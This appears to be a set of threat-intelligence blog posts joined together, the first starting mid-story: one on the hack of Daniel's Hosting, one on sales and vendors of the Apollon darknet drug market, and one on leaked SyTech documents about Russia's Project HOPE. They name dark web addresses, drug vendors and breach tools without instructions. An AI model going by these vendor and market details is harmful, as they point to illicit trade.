On March 15th 2020, Winzen once again updated his landing page to state that all hidden services were offline to make migration of his user’s hidden service URL at a different darknet hosting provider. By April 1st 2020, DarkOwl had identified approximately 1,200 hidden services topically tagged to Daniel’s hosting as back (or still) online.

DarkOwl analysts observed that many of the 1,200 hidden services consist of active sub-domains on Winzen’s historical V2 onion URL (tt3j2x4k5ycaa5zt[.]onion). Most of the subdomains on the V2 onion URL first came online in June 2017, and have been consistently active to date. Many of these include offensive keywords, such as, pedohosting.tt3j2x4k5ycaa5zt[.]onion, and nazism.tt3j2x4k5ycaa5zt[.]onion. These are just a few examples of several dozen others that include similarly banned topics and offensive keywords.

These V2 domains simply re-direct to the V3 Tor landing page, and have never had web content available to publicly collect. Nevertheless, several of these subdomains contain illicit keywords that suggest Winzen might have been complicit with hosting illegal content, despite his rules and policies against such.

Interestingly, there are also another 43 subdomains starting with the string “password” and an additional 23 with the phrase “freedomhosting” or “freedomhostingnode” suggesting at one point, Winzen collaborated with long-time controversial darknet hosting provider, Freedom Hosting. Are these the “nodes” GhostSec was referring to on March 3rd?

Currently, the V2 URL redirects to Daniel Hosting’s V3 URL, which Winzen adopted after the November 2018 hack – presumably for enhanced security. Both domains have been referenced for his SMTP email domain by Winzen on his contact page. The Bitcoin addresses listed on Winzen’s surface web mirror, danwin1210.me, and the Tor hidden service are different, but both have had numerous transactions since the hack occurred on March 10th, 2020.

The darknet will carry on

Despite Winzen’s encouragement for his users to migrate their existing hidden services and URLs to other darknet hosting provider, most of the services didn’t bother or adopted new URLs. DarkOwl analysts reviewed over 5,000 URLs associated with Daniel’s Hosting since the first of the year, to find less than two dozen had migrated and retained its URL as of early April 2020.

A long-time darknet Twitter-like social network called Atlayo (atlayofke5rqhsma[.]onion) is back online and operating using its previous URL, and it has long been rumored that Daniel was once a key moderator and administrator for this service.

Security concerns over the once popular PHP-based LE-Chat platforms has more users migrating to IRC over Tor proxy, while those with hosting resources are offering up their web servers for hosting content in the interim. Users capable of web development have set up even more hidden services than they had while relying on Winzen alone, and clones of Daniel’s home website are being advertised to ostensibly create a sense of familiarity and security.

One such example, OnionCommunity, online since the fall of 2019, has revamped with a layout shockingly similar to Winzen’s. In addition to a chat (IRC), online link list and test, OnionCommunity also advertises social media, market and cloud services that are in development.

While it took several weeks for users of Daniel’s services to recover what data was available and scrambled to figure out where to congregate and how to communicate, the community seems more resolved than ever to continue with or without Daniel’s support and the darknet itself continued to grow throughout the second-half of March, while Winzen was offline.

In fact, since March 11th 2020, DarkOwl has observed an average growth of 387 new domains per day across the entire darknet.

Stay tuned for more updates as we continue to track darknet trends and post updates on our blog.

Overview

On the 31st of January, members of the dark web community began warning users of the imminent exit scam of Apollon cryptomarket. Apollon Market, established in March 2018, has developed into a market with credible reputation in recent months as other key longtime markets have disappeared or been seized by authorities.

After reviewing the archived market data captured by DarkOwl Vision, our analysts assess with high confidence that Apollon Market experienced a positively skewed distribution of activity driven by a surge of vendors appearing on the market in late 2019.

This evidence suggests that law enforcement efforts to curb criminal behavior on dark web markets through heavy DDoS and subsequent seizure increase vendor sales for those vendors who are highly mobile across marketplaces.

Furthermore, addictive psychoactive stimulants, such as methamphetamine and cocaine, appeared frequently in not only the top number of listings sold and offered, but also in revenue. This suggests a substantial rise in popularity on the dark web marketplaces for these goods (as compared to Baravalle, Lopez and Lee’s Mining the Dark Web).

Apollon Market is largely a drug market with self-advertised market data from their landing page, suggesting that drugs comprise over 75% of the goods on offer. DarkOwl Analysts reviewed these to uncover that many of the advertised listings are duplicative and some categorized incorrectly.

Despite this, on average, there are significantly more drugs offered than digital goods, but some vendors observed considerable larger revenue and return on investment in the digital goods market segment.

Quantitative Findings

• Since 2018, DarkOwl Vision archived 35,028 unique listings across 1761 vendor accounts on Apollon, comprised of a mixture of sales categories including drugs, digital goods, fraud, and malware.

• DarkOwl analysts assess the total value of the market is $10,986,561 USD based on total sales reported and the value of the listings offered at the current exchange rate from Bitcoin (BTC) to USD or Monero (XMR) to USD.

• The average revenue generated per vendor is $6,249 USD while the median revenue per vendor is $933.25 USD, suggesting that the distribution of the revenue across the market is heavily skewed, positively.

• Despite this positive skew, there appears to be an outlying segment of particularly high-revenue vendors with much higher reported revenue than the rest of the vendors in the market.

• This is supported by the fact the top 10 vendors in sales revenue amassed an estimated $1.6 Million USD in total sales, while 14% of all vendors reported no sales at any point during their tenure on the market. Some non-active vendor accounts could easily be used for test purposes or as a law enforcement honey pot. 

Countries of origin

Of the 35,028 unique listings, many do not specify the country of origin. Some merely state their location as “Worldwide,” suggesting that the vendor is potentially a network of suppliers around the world, the good can be delivered digitally, or the vendor is willing to assume the heightened risk of international shipping.

Of the 75% of listings that do provide a country of origin, 57% of the vendors claimed their goods or services originated within the USA, United Kingdom, Germany, and the Netherlands. 4.8% of them kept the country of origin generic as “Europe” and others specified generally unsuspecting locations such as the Pitcairn and Wallis and Futuna Islands in the South Pacific.

Listings

Drugs comprise the largest categorical segment of Apollon Market, with over 44,000 total listings, although some of these are duplicative [see Analyst’s Note below].

Of the drug listings, Cannabis, Stimulants, and Ecstasy comprise over 50% of those advertisements. A review of the total sales and revenue revealed that addictive, psychoactive stimulants were in the highest demand from this market, and the listing with the largest number of reported sales is Colombian Cocaine.

Based on current currency conversion rates for BTC to USD, the listing with the highest estimated revenue is a private “VIP” Digital Good offered by long-time dark web vendor, Gfellas, while the remaining 4 top revenue-generating listings were all drug related.

Analyst’s Note: Bear in mind that since the exit scam began, the market administration has been deactivating older listings, erroneously categorizing many advertisements across multiple categories, and manipulating vendor login data, prompting the need for a more rigorous review of the listing titles and descriptions using machine learning at a later time.   

Apollon Market’s Evolution over Time

In comparison to other dark web cryptomarkets’ longevity before exit scam or seizure, Apollon had a considerable run, trading for almost two years with minimal downtime. During the first few months, little activity occurred on the market, but the market showed considerable pickup in total number of vendors trading after other key markets went offline.

Market closures drive traffic

In July 2019, when Nightmare Market exit-scammed, DarkOwl observed that the total number of vendors on Apollon nearly doubled.

In October 2019, Berlusconi was seized by the Italian authorities, followed shortly by Cryptonia, which disappeared in late November 2019. After Berlusconi’s seizure, several vendors used their credibility from years of trading on those markets as imported feedback to drive a high volume of sales on Apollon.

Apollon experienced the largest number of new vendor registrations in December 2019, post Cryptonia, at 390 new vendors.

Key Vendors

The top ten vendors by total number of listings along with their corresponding number of total sales are provided in the chart below. The top ten vendors in volume of offers does not link with those grossing the highest revenue nor having the highest total number of sales.

The top 3 vendors in revenue comprise 6% of all the revenue of Apollon Market while the top 10 vendors accumulated over $1.6 Million USD in total sales. The top vendors with the highest revenue trafficked drugs, suggesting that dealing in drugs yields higher gross income on dark web markets than digital goods or fraud services, such as fake passports.

The first market vendors

Despite the fact the market’s reported established date is March 2018, 45 vendors appeared on the market on 10 July 2018. DarkOwl assumes during the first three months, the market was likely in a testing phase and did not have any active trading occurring. Of those vendors appearing on 10 July 2018, the vendors with the largest total sales, were Dr.White3, g0ldenboy, HeinekenExpress, usagear, stanovo1ONLY, SUDO, and NUTSPRACKER; however, none of these vendors appear in the top 20 revenue-generating vendors list at the time we conducted analysis.

Vendors with the highest revenue

Based on historical market data and the current vendor profiles, the vendor using the moniker magicblue migrated over to Apollon in mid-September 2019, shortly before the announcement of Berlusconi’s seizure by Italian authorities. The vendor brought with them significant positive feedback and credibility from their years trading on Berlusconi.  Shipping their orders from Germany, magicblue’s principle drug market is ecstasy and LSD. Their highest value listing on Apollon Market is 250g of A+++ MDMA “top quality” at $812 USD per order.

Conclusion

DarkOwl Analysts’ analytical survey into Apollon Market yielded insight into the evolution of the cryptomarket in vendor registrations and listings, countries of origin and shipping, and general revenue generating activity. At time of writing, the market value is at $10.9 Million USD (based on an exchange rate of 1 BTC = $10,222.7 USD, the value at time of analysis) with addictive, psychoactive stimulants as the most popular, highest revenue generating category of drugs offered on the market.

Overall, Apollon Market is positively skewed distribution of revenue with the surge in vendor registrations and activity after Nightmare, Berlusconi, and Cryptonia disappeared either due to exit scam or market seizure. Vendors brought with them credibility and positive customer feedback and immediately began trafficking their goods and earning revenue. Like the Greek mythological Hydra, concerted efforts by law enforcement to remove drug trafficking on the dark web merely strengthens the resolve of the community and drug vendors continue to be highly mobile and attain uninterrupted success on emerging markets.

In July of 2019, 7.5 TB worth of documents that were stolen from a Russian FSB contractor known as SyTech were published on the darknet by the hacker group 0v1ru$. Included in the documents is a project known as “HOPE,” which contains contents focused on how Russia intends to control the flow of information within and outside of their borders. While the notion and development of nation-wide intranets that exist in isolation from the global internet at the behest of nation-state authorities is nothing new (and in fact it has become increasingly common), it remains noteworthy – largely due to its association with politically oppressive regimes.

After discovering the leaked SyTech documents on DarkOwl Vision (pictured below), our analysts decided to take a closer look at project HOPE due to its relevancy to decentralized internets (including darknets). Upon conducting this analysis, DarkOwl researchers determined that Russia has been developing some of these plans as far back as 2012 and have concluded that it is very likely that HOPE was the foundation for Russia’s new Sovereign Internet Law, which was recently enacted on November 1st, 2019.

The SyTech leak

WHO IS SYTECH?

SyTech was a Russian Federal Security Service (a.k.a. the FSB, the successor agency to the KGB) contractor registered in Moscow that primarily focused on electronic and signals intelligence research. Publicly disclosed customers of the FSB include the national satellite communications operator JSC RT Komm.ru and the analytical center of the judicial department under the Supreme Court of Russia. Other non-public projects were commissioned by military unit no. 71330, which is believed to be part of the 16th Directorate of the FSB – who were accused of sending files with spyware to Ukrainian military and intelligence agencies in March 2015. Ironically, SyTech is also located in the same building the 16th Directorate of the KGB of the USSR previously occupied. Their 2018 public contract value was 40 million rubles, or $622,631 USD.

SYTECH HACKED

On July 13, 2019, SyTech suffered what BBC Russia called “possibly the largest data leak in the history of Russian intelligence services” when a group of hackers identified as 0v1ru$ gained access to an active directory server, stole 7.5TB of data, and defaced their webpage with a “yoba-face” (pictured to the right).

Though the image was first posted to 4chan in 2008, it is now most prominently associated with this breach, as evidenced by the spike on GoogleTrends on the date the hack was published. Analysis of screenshots posted by 0v1ru$ suggests that the tools used to gain access were ticketer.py, PSExec, and proxychains.

The leaked data includes 20 non-public IT projects ordered by Russian special services and departments. 0v1ru$ copied the data, deleted it from SyTech servers according to Twitter screenshots (pictured), and shared the documents with Digital Revolution, a separate (to our knowledge) hacking group who successfully breached Kvant Research Institute in 2018. Digital Revolution shared the documents with journalists, published screenshots of information on their Twitter – while mocking Russian officials – and the documents became widely available across the darknet.

In the aftermath of these events, 0v1ru$’s Twitter account was deleted, and there has been no word from them since the day of the hack. It is unknown if they deleted their Twitter account or if Twitter removed the account. Their motive is unclear, though it seems the group was small in membership. Digital Revolution published a written piece encouraging dissent against Russian authorities in the wake of these documents in early August 2019, and have been silent since. SyTech’s website has been offline since the defacement and no official statement regarding the hack or the future of SyTech was published. It is unclear if SyTech still exists, has been restructured, or dissolved after the leak.

There was no comment from the FSB, though BBC Russia reports no state secrets were leaked. Some have noted that this is another example of contractors being the weakest link in maintaining secrecy during research and development. 

PROJECT HOPE

Though media widely reported on the SyTech hack itself, very few individuals or media outlets have examined the contents of the leaked documents. The level of detail, total amount of information, and potentially compromising information is not apparent from reading currently published reports; in most cases, a brief summary of a handful of the 20 projects is provided, and often, these summaries are not in English. DarkOwl analysts have obtained these documents and conducted analysis to: 

1)    Examine the extent of leaked information – were only project summaries leaked, or entire proprietary technical plans?

2)   Examine the impact of leaked information – did this leak impact or result in any legal or social issues in the future?

3)   Examine the utility in analyzing leaked information – does the resources expended to acquire and analyze these documents produce actionable intel, open further lines of inquiry, or increase our knowledge base surrounding these issues?

To accomplish these goals, DarkOwl analysts examined one of the twenty leaked projects: надежда, or Nadezhda, which translates in English to HOPE.

It is apparant that HOPE’s main directive was to develop a method of disconnecting Russia from the global internet, while allowing information to still travel within Russia; in other words, they sought to develop their own nation-wide intranet. Purportedly, this would aid in protection from a foreign cyberattack – allowing Russian authorities to theoretically “unplug” Russia from the global internet to halt foreign attacks – if the technology developed via this project proved successful.

This work was carried out between April 1, 2013 and October 31, 2014 and was funded by Russia’s military unit no. 71330.

Once extracted, it was discovered that, unsurprisingly, the entire HOPE folder was in Russian. The folder contained 5 Microsoft Word documents, and a PowerPoint presentation. The bulk of the information from the documents was translated via Google Translate, though Russian translators assisted in the interpretation of potentially inaccurate or mistranslated words. One document in the leak indicates that it is likely all of these documents are components of a larger “Scientific and Technical Report” on the HOPE project, totaling 519 pages, 82 figures, 201 tables, 110 literature sources, and 7 appendices.

A CLOSER LOOK AT THE CONTENT OF THE DOCUMENTS

The SyTech developed PowerPoint presentation appears to be a summary of the research and development conducted during the HOPE project. It is likely this was created near the end of the project in 2014 and presented to military unit no. 71330. It summarizes the work completed by SyTech, but also names and summarizes the work done by other collaborators on the HOPE project. According to this, the collaborators of HOPE are:

• SyTech, who primarily focused on the visualization and analysis of cross-border routes for Internet traffic

• The RZNF Federal State Unitary Enterprise, who worked on a project codenamed “Nadezhda-T”, aimed at monitoring and filtering traffic

• Institute for Security and Information Analysis, responsible for compiling the work done on HOPE and testing it and training future users

The presentation also lists the sources of information they used, which are primarily in English and are publicly available. The results indicated success in achieving their research goals at a small scale but raises concerns about scalability.

The Word documents are components of a larger “Scientific and Technical Report” on the HOPE project, written at various stages in the project. One of the final documents suggest interim and final reports, thus there is some degree of overlap in the information included in these documents.

The first document is only 2 pages and seems to have been created at the genesis of the HOPE project. It was likely created in November or December of 2012 and states a generic goal of “studying the principles of cross border routing on the internet”. It also states goals of examining vulnerabilities in TCP and Border Gateway Protocol (BGP), routing traffic through trusted government nodes, and the storage and analysis of traffic through these nodes.

All other documents are components of the Scientific and Technical Report at various stages in development. Two of these documents are highly technical examinations of topics such as traffic routing tests, BGP tests, and development of special visualization software.

Of particular interest for this post is a 260-page document that indicates it is the final version of the Scientific and Technical Report. This appears to have been delivered to the customer at the same time the PowerPoint was created and delivered. It includes details such as:

• the required software and OS

• shared libraries

• server platforms

• the inclusion of government connections.

There is also some discussion of the use of deep packet inspection to analyze traffic, and criteria that may be used to filter and direct traffic. The report suggests that the research goals were met on a small scale; this includes the development of “state machines” provided to ISPs and includes diagrams of the machines and their functionality.

KEY TAKEAWAYS

These leaked documents show that SyTech and others were early in the development and testing phases of a project that was concerned with monitoring internet traffic, routing traffic based on state-developed criteria, and gaining control over internet access within the borders of Russia. In 2013-2014, when this project was underway, most work focused on what appears to be proof-of- concept/prototype development. To our knowledge, this was not tested on a larger scale, though the documents do indicate some concern over scalability. However, the PowerPoint indicated large-scale testing would be the responsibility of a non-SyTech body, thus, wouldn’t be included in these leaked project files. It should be noted that involvement of other agencies in the HOPE project has not been reported in media reports to date. 

Analysis of the technical documents suggest that control of internet traffic would be primarily accomplished by state sponsored BGP hijacking. A full analysis of this process is outside the scope of this post, but effectively, BGP hijacking uses the assumption that interconnected networks are telling the truth about which IP addresses they own to maliciously reroute internet traffic. In layman terms, it has been compared to changing out the exit signs on a stretch of freeway and rerouting traffic to incorrect exits, if no one were watching the freeway signs. BGP is managed by ISPs; considering the extensive research SyTech conducted into BGP traffic and the installation of technology at Russian ISPs, it is a strong possibility that BGP hijacking is the foundation for Russia’s plans to control the internet.

Since HOPE was carried out, there has been a great amount of reporting and concern surrounding the development of Russia’s nation-wide intranet. DarkOwl analysts believe it is likely that HOPE became the foundation for what is now known as Russia’s Sovereign Internet Law.

Russia’s Sovereign Internet Law

On November 1, 2019, Russia’s Sovereign Internet Law took effect, giving Russian government officials a higher degree of control over the nation’s internet access and content. Ostensibly, the law is aimed to protect the nation’s cybersecurity by allowing government officials to block access to content when an “emergency” has been declared.

POLICY CHANGES DUE TO ENACTMENT OF THE LAW

In practice, the law has the largest impact on internet service providers located in Russia. Under this law, ISPs are required to:

1.         Install equipment that routes Russian internet traffic through state-controlled servers in the country

2.         Install equipment capable of deep-packet inspection, which is capable of not only identifying the source of traffic but the filtration of content

The first requirement is aimed at creating a new DNS system that can filter traffic in a way that data sent between Russians reaches its destination while any traffic directed towards foreign computers is discarded. Theoretically, this allows for Russia to essentially “unplug” from the global internet while nation-wide Runet service is uninterrupted. This is purportedly to protect Russia in the event of foreign cyberattacks or sanctions that attempt to isolate the country’s internet presence; for example, when US Cyber Command cut off internet access to the infamous Kremlin-backed Internet Research Agency in efforts to defend the 2018 US Midterm Elections against foreign interference. Notably, this new DNS system is not expected to take effect until 2021.

The second requirement allows state regulators to filter traffic and block what it wants on a granular level; elements as small as individual social media and forum posts can be examined and blocked based on the content of the messaging. Deep packet inspection (DPI) technology is universally used by ISPs to prioritize traffic and block unwanted protocols; however, in this case, the traffic is not controlled by the ISPs but rather Russian communications regulator Roskomnadzor. The language surrounding this aspect of the law is, likely purposefully, vague; the law gives regulators full discretion to decide what constitutes a security threat or dissent that may harm the “stability, security, and integrity” of the internet. According to open source reporting, tests of Russian DPI technology will continue in the Urals region until the end of 2019.

PUBLIC RECEPTION OF THE LAW

The degree to which the Russian government can control the flow of information due to this law has drawn strong reactions from both the Russian populace and international community.

According to research conducted by the Russian state-sponsored pollster, VTsIOM, 52% of Russians indicated they were opposed to the sovereign internet bill and the internet should play a role in “uniting the whole world”, while only 23% believed the internet should be limited to the country’s borders. Rallies opposing the bill in Moscow, Voronezh, and Khabarovsk were “some of the biggest protests” in years, totaling over 15,000 people in Moscow alone (though police estimated only 6500 attendees). The law has often been referred to as a digital Iron Curtain, harkening back to the Cold War separation of the USSR and the West.

Outside of Russia, the law has been almost universally condemned. Ten human rights, media, and Internet freedom organizations released a joint statement criticizing the law and calling on President Putin to not sign it – though he did one week after publication of the statement. They and others suggest that the law does not satisfactorily define what constitutes security threats and appropriate responses and lends the government too much discretion in how these laws will be enforced. There are also no legal protections for internet users to prevent ISPs from accessing, collecting, and selling the information gleaned via DPI. Many view this new law as continuing the erosion of internet freedoms in Russia; Freedom House categorizes Russia as “Not Free” and argues internet freedom is continuing to decline because of this law and other policies. For instance, according to a report from the Agora International Human Rights Group, someone in Russia was imprisoned for their online activities every 8 days in 2017.

CRITICISMS OF THE LAW

Moving beyond criticisms based in human rights and social issues surrounding the law, numerous technical experts are skeptical that enforcement of the law is currently possible. Both the establishment of a nation-wide intranet and DPI inspection of all traffic faces numerous, possibly insurmountable, technical hurdles.

Many experts are quick to point out that the Russian development of their alternate DNS system is dissimilar to China’s Great Firewall; whereas China’s internet was developed via a small number of state-run network operators – with a goal of restricting access in mind – Russia’s internet has developed freely over the last 30 years. Undoing that development would be a monumental task; the more developed a country’s infrastructure, the more laborious the blackout procedure becomes. David Belson, the senior director of Internet Research and Analysis at Internet Society, told NPR:

“..there were dozens of existing internet exchange points in Russia, some of which have hundreds of participants… basically its challenging – if not impossible, I think – to completely isolate the Russian Internet.”

Twelve organizations oversee the root servers for the current DNS system; zero of these are located in Russia. Undoing those global network connections will be difficult, and this kind of regulatory model could risk damaging the reliability of internet connections in Russia. According to Sophos:

“Internet traffic isn’t like a pipe that can be turned on and off or diverted at will. It functions as a cooperative system in which Russian ISPs must peer traffic that is heading to other destinations in ways that belie simple concepts of internal and external, good and bad.”

Some predict that, if nation-wide separation from the global internet proves impossible, it will be more likely that specific regions within the country can be disconnected for short periods of time.

Previous attempts at using law to forbid a form of technology has failed; last year, Russia attempted to ban the messaging app Telegram for refusing to provide encryption keys to Russian authority, to practically no effect, other than simultaneously blocking access to allowed content. Experts also point out that the rhetoric surrounding this bill regards protection from foreign cyberattacks, yet the DPI requirement of the law only serves to increase control of internet within Russia. Law-abiding users will notice the change; the installation of DPI equipment across all ISPs in Russia has been compared to the crush of passengers trying to get on the Moscow metro at rush hour.

There is no consensus among experts what impact this law will have long-term; it may lead to the types of humans rights violations watchdogs are worried about, or it could cause no change at all. It is also uncertain how this law may impact Russian darknet activity, even among Russian darknet users (Figure 8). Activity may increase as users seek to circumvent the newly enacted law; it may decrease if the technology implemented is sophisticated enough to limit dark web activity. Theoretically, BGP hijacking could manipulate and control entry relay node traffic which would destroy the anonymity provided by Tor for Russian users.

Russia has a sizable presence on the dark web and is the most common foreign language in DarkOwl’s database; DarkOwl will continue to monitor this activity for any changes or modifications of dark web use.

Final takeaways: Project HOPE, Russia’s new restrictive law, and the internet as a human rights issue

CONCLUSIONS REGARDING THE LEAKED PROJECT HOPE DOCUMENTS

Upon revisiting the questions we sought to answer during our analysis of the leaked documents, we were able to come to several conclusions:

1.         Examine the extent of leaked information – were only project summaries leaked, or entire proprietary technical plans? 

Hackers leaked extensive documentation surrounding the HOPE project on the dark web. The leak included project summaries, supporting technical documents, test results, and the final customer product. It is clear there was much more leaked than what was reported via most media sources and raises numerous questions over what is contained in the leaks of other projects from SyTech.

2.         Examine the impact of leaked information – did this leak impact or result in any legal or social issues in the future?

Although it cannot be directly linked, the preponderance of evidence suggests that HOPE was a precursor to the Russia Sovereign Internet Law. The stated goals and methods discussed in HOPE directly reflect the realities of the Sovereign Internet Law. Though the official response minimized the impact of these leaks, the documents demonstrate a clear connection to future legal and social developments. 

3.         Examine the utility in analyzing leaked information – does the resources expended to acquire and analyze these documents produce actionable intel, open further lines of inquiry, or increase our knowledge base surrounding these issues? 

The examination of these documents provided insights unavailable in any other report or analysis of the SyTech hack. Considering the information obtained and that HOPE likely resulted in a divisive law, future research should be conducted on the other leaked documents in efforts to predict other future policy or technological development.

THE INTERNET AS A HUMAN RIGHTS ISSUE

The United Nations Human Rights Council (UNHRC) has consistently stressed the importance of taking a human rights based approach to internet access. In June of 2016, the UNHRC passed resolution A/HRC/38/L.20, addressing “the promotion, protection, and enjoyment of human rights on the internet.” The resolution affirms that the “same rights people have offline must be protected online,” and outlines the perceived importance of internet access to the human rights protections of the citizens of member nations. 

Press coverage of the initiative reported that, despite passing with consensus, Russia and China opposed this resolution and sought to remove language relating to the “human-rights based approach” to internet access. This is relatively unsurprising; China’s “Great Firewall” stratagem to internet censorship is well-documented by academics, human rights watchdogs, and western media. Furthermore, the notion of free access and usage of the internet has been under attack by various nation-states, as reports of government-backed nationwide internet outages, social media blackouts during military conflict, the criminalization of dissent, and the murder of bloggers and journalists have only increased in the public eye since the passing of this resolution. 

The UNHRC further demonstrated this commitment to internet freedom in July of 2018 when they reaffirmed the internet protection resolution – with no States formally dissociating from the language in the resolution. However, the emphasis on protecting human rights online as well as offline is minimized in this resolution, and the United States no longer is listed as a participating State.

Further developments have shown no signs of Russia slowing down in their pursuit of state-controlled internet, often hiding behind a veil of curbing cybercrime. Other nations such as Iran have followed suit and have begun exercising control over internet access.

WILL THESE NEW RESTRICTIONS LEAD TO AN INCREASE IN DARK WEB USERSHIP?

In name, the Russian Sovereign Internet Law is already in effect. However, the social impact from this law will not be felt until later, and it is uncertain how this law will alter the amount and type of activity on the dark web, if at all.

Fundamental changes in the structure of the internet don’t occur overnight, or over just a few years – research, development, and implementation of this technology took nearly a decade via the HOPE project, and still isn’t close to completion. If we want to see what is coming next, it may be best to look at similar projects that are being researched now rather than wait for their deployment.